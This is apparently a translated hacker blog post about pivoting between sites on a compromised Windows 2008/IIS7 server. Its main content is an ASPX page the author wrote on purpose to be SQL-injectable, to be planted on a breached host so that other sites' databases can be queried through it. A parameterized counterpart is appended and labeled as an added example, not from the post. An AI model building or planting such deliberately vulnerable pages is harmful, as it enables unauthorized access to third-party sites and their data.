Yesterday 4z1 and I were looking at a site. Privilege escalation was very hard; we spent a full five hours on it with no result. 2008 + IIS7, no sa, no root, none of the usual services.
In the process I used ASPX constructed injection to cross over to other sites. I found a pile of code online and not one piece of it worked.
It isn't much code, so I just wrote one myself and was done with it. So annoying.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
        <script language="c#" runat="server">
            // Runs on every request; AutoEventWireup binds this to the page's Init event.
            void Page_Init(object sender, EventArgs e)
            {
                // Connection string is read from web.config; "连接名" is the placeholder for its name.
                System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
                conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
                conn.Open();

                string i = this.Page.Request.Params["xxser"]; // the parameter here is ?xxser=1

                // The raw parameter is concatenated straight into the SQL text, which is what makes this page injectable.
                System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
                // ExecuteNonQuery returns -1 for a SELECT; it is used here only so the statement runs and any SQL error surfaces.
                int x = command.ExecuteNonQuery();
                Response.Write(i + "\n");
                Response.Write(x);
                conn.Close();
            }
        </script>
    </div>
    </form>
</body>
</html>
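For contrast, this is the same lookup written so that the request parameter cannot alter the query: the value is validated as an integer and bound as a typed SqlParameter rather than concatenated. This is an added example, not code from the post; the connection name "连接名", table "[表]", column "列名" and parameter "xxser" are the post's own placeholders.

```csharp
// Added example: hardened counterpart of the injectable page above.
// Placeholders ("连接名", "[表]", "列名", "xxser") are taken from the post.
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;

public partial class SafeLookup : System.Web.UI.Page
{
    protected void Page_Init(object sender, EventArgs e)
    {
        string raw = Request.Params["xxser"];
        int id;
        // Reject anything that is not an integer before it gets near the database.
        if (!int.TryParse(raw, out id))
        {
            Response.StatusCode = 400;
            Response.End();
            return;
        }

        string cs = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;
        using (var conn = new SqlConnection(cs))
        // The query text is constant; the value travels as a parameter, so
        // characters such as quotes or comment markers cannot change its structure.
        using (var cmd = new SqlCommand("select count(*) from [表] where 列名 = @id", conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            int rows = (int)cmd.ExecuteScalar(); // ExecuteScalar returns the first column of the first row
            Response.Write(rows);
        }
    }
}
```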